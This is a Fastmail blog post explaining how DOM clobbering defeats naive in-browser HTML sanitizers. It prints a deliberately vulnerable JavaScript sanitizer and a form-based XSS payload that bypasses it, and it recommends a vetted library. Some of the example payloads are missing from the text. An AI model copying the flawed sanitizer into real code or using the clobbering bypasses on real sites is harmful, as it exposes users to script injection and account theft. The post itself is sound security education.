Sanitizing HTML – the DOM clobbering issue

December 20, 2015

When email first began, back in the mists of computing history, messages were only plain text. As it moved into the mainstream, users wanted to to add more advanced formatting and so email clients allowed HTML to be used to mark up rich-text emails, since it seemed to be working so well for this whole world wide web thing.

While adding immense formatting power to email, the lack of any standardization of exactly what subset of HTML and CSS to support has led to a world of pain for authors looking to make their emails render consistently everywhere. Email clients range from full support for pretty much all of the latest HTML/CSS features (such as in Apple’s Mail.app), to Microsoft Outlook, which thinks that Word is an acceptable HTML renderer. Sigh.

Developers of webmail systems have an extra problem to deal with. The HTML of the email must be embedded inside the site’s HTML that defines the whole user interface. It must do this without breaking the rest of the HTML, and most importantly without allowing any script or other potentially malicious content to be inserted. Since the code would execute in the same context as that of the webmail system itself, it could potentially take over the user’s account and steal their data. (This is known as a Cross-Site Scripting, or XSS, attack.) Therefore the HTML in the email must be transformed, or sanitized, from the original format to a version that preserves as much formatting as possible while removing anything potentially dangerous.

HTMl is essentially just a serialization format for the Document Object Model (DOM). In order to be 100% safe in sanitising it, your code must know exactly how the browser will interpret the HTML when building its DOM tree. For various reasons, this is very complicated. There is now a spec that defines how to handle every edge case, however it is long and pretty much only web browsers have ever implemented it fully. Therefore, most sanitizers that operate on the server do so using a simplified version; and any discrepancies may lead to security holes.

For rich web clients that construct the UI using JavaScript however, there is an alternative option: sanitising in the browser. The hardest part about HTML sanitization is parsing the DOM exactly as the browser does. And the one thing that you can guarantee will parse the HTML exactly as the browser does, is the browser itself!

All modern (and even most not-so-modern) browsers now include APIs for parsing HTML into a DOM tree without executing any scripts, or loading any network requests (like images). You can then manipulate this to clean up anything potentially dangerous before importing it into your “live” DOM (which results in scripts being run, images being loaded, and the user seeing the result on their screen).

So now our sanitization is simple, right? We iterate through the inert DOM tree, apply a whitelist of allowed tags and attributes, remove anything we don’t want and then import the final safe result. Well, kind of, yes. But oh my, the devil is in the details. Allow me to introduce you to DOM clobbering…

DOM Clobbering

The DOM is the API that allows JavaScript code run in the browser to access and manipulate a tree-based representation of the document, initially built by parsing the HTML of the page. The original APIs were thrown together quickly by a single browser, without standardisation and then copied by all the other browsers in order to maintain compatibility with sites coded specifically to their competitor. Thankfully, that’s not how things work today (at least, most of the time!), but all modern browsers still maintain support for these outdated features so that (very) old pages continue to work.

You absolutely do not want to use these features in any new code, as they are astonishingly badly thought out, and there are much better ways now to accomplish the same things. However, this means that many people don’t know or have forgotten about them. And their presence can still lead to massive security holes.

Let’s look at the problem by example. Here’s a little script that looks perfectly reasonable for sanitizing some untrusted HTML. We use a whitelist only so we can’t be fooled be malicious things we don’t know about, and for the sake of this exercise let’s presume that we haven’t accidentally allowed something that could be used maliciously to appear in the whitelist.

`// A real whitelist would probably include a lot more safe things!
// This has been abbreviated for demonstration purposes.
var whitelist = {
    nodes: { BODY: true, FORM: true, A: true, B: true, IMG: true },
    attributes: { alt: true, style: true }
};

function cleanNode( node ) {
    if ( !whitelist.nodes[ node.nodeName ] ) {
        node.parentNode.removeChild( node );
        return;
    }
    var attributes = node.attributes;
    var children = node.childNodes;
    var l;

    l = attributes.length;
    while ( l-- ) {
        name = attributes[l].name;
        if ( !whitelist.attributes[ name ] ) {
            node.removeAttribute( name );
        }
    }

    l = children.length;
    while ( l-- ) {
        cleanNode( children[l] );
    }
}` 

`function sanitiseHTML( html ) {
    var doc = new DOMParser().parseFromString( html, 'text/html' );
    cleanNode( doc.body );
    return doc.body.innerHTML;
}` 
For those not familiar with JavaScript, briefly this code does the following:

 	1.  Creates an inert document and parses our potentially dangerous HTML.
 	2.  Starting at the `<body>` node (the root node for user-visible content), it uses a simple recursive descent to walk the DOM tree and remove any attribute or node not in the whitelist. If a node is "bad", we remove it and all its children; we don't try to keep the children at all.
 	3.  We then return the HTML that represents the now "clean" DOM.

At first glance, this looks perfectly reasonable. And indeed, a quick Google around shows [very similar looking functions in the wild](https://github.com/basecamp/trix/blob/d42e722c7af21572fc8386a0f20351151062845d/src/trix/models/html_parser.coffee#L227). Sadly, this is actually riddled with security holes, and the main reason is DOM clobbering. Let's have a look at a few ways we can break this (there are more; I leave those as an exercise to the reader).

### Security hole 1

For this first method of breaking the above, we'll presume "name" is not in your whitelist of allowed attributes, because you don't want to risk a conflict with existing names you already have in the page. Perfectly reasonable, very security conscious. But now if you pass the following to the sanitizer:

You'll find the output is this (except in Chrome, which seems to have recently fixed this kind of clobbering; good job Chrome):

Oh dear! The attacker just managed to get a script through, and your users' data has now been compromised. How did this happen? Well, if you have an `<img>` with a `name` attribute, the browser will helpfully add a property with that name on the `document` object that gives direct access to the DOM node representing the image, even though this masks the original property (the root `<body>` node)! So when we call `cleanNode( doc.body )`, we actually just sanitize the image and never see the rest of the document.

The really clever bit is that the sanitization of the image removes the `name` attribute, which stops the property from masking the actual `body` node on the `document`, so when we return the `innerHTML` we actually return all the nodes, including the unsanitised `<script>`!

### Security hole 2

OK, let's say you've fixed that (maybe you cached a known-good reference to the `document.getElementsByTagName` method and called that to get the `<body>`). Feeling safe now? Well sorry, our code is still fatally flawed. Consider the following HTML:

``` You might guess where this is going. The `childNodes` property on the `

` node has been "clobbered", due to a DOM Level 0 feature to help you do forms.

If you have a <form> element, then an input with a name property is made available as a direct property on the form DOM node, masking the original value. If there’s more than one input with that name, the property becomes a NodeList (an array-like collection of the nodes), which looks remarkably like what you would expect for the childNodes property – only it doesn’t have all the children! Thus our cleaning code never sees the <script>, and again it slips through the filter.

Security hole 3

Right. So you’ve realized that the recursive descent is problematic given the clobbering, and thought “ah hah! Let’s use the NodeIterator API instead so that the browser is doing the iteration for us and we avoid any clobbering”. Very good. But… the same DOM clobbering feature from before can still be used to allow malicious attributes to slip through. Consider the following:

<form onhover="alert('All your websites are belong to us');">
    <input name="attributes">
</form>

The “sanitised” output is:

<form onhover="alert('All your websites are belong to us');"></form>

Even though onhover is definitely not on our whitelist! What’s happened now is that the attributes property on the <form> has been clobbered, so instead of iterating through the attributes, our sanitization code got the <input> node instead, which resulted in nothing actually being cleaned.

The solution

By now I hope you realize that: a) the DOM is a mess, and b) you will almost certainly introduce security bugs if you try to write a sanitizer yourself. In light of that, if you have need to sanitize HTML you should use a well-tested existing library. If your application allows you to do the sanitization in the browser, we recommend DOMPurify, created and maintained by Dr Mario Heiderich at the cure53 security group. It’s fast, robust and been professionally security audited.

Here at Fastmail we believe in defense in depth, and we use DOMPurify in addition to a server-side XSS filter and a strict content security policy (each of which should be individually capable of stopping malicious HTML from doing much damage). As part of our effort to help make the whole internet more secure, we have also submitted several patches back to DOMPurify, and made it eligible for our bug bounty program, even for bugs that would not otherwise affect Fastmail due to our other security measures.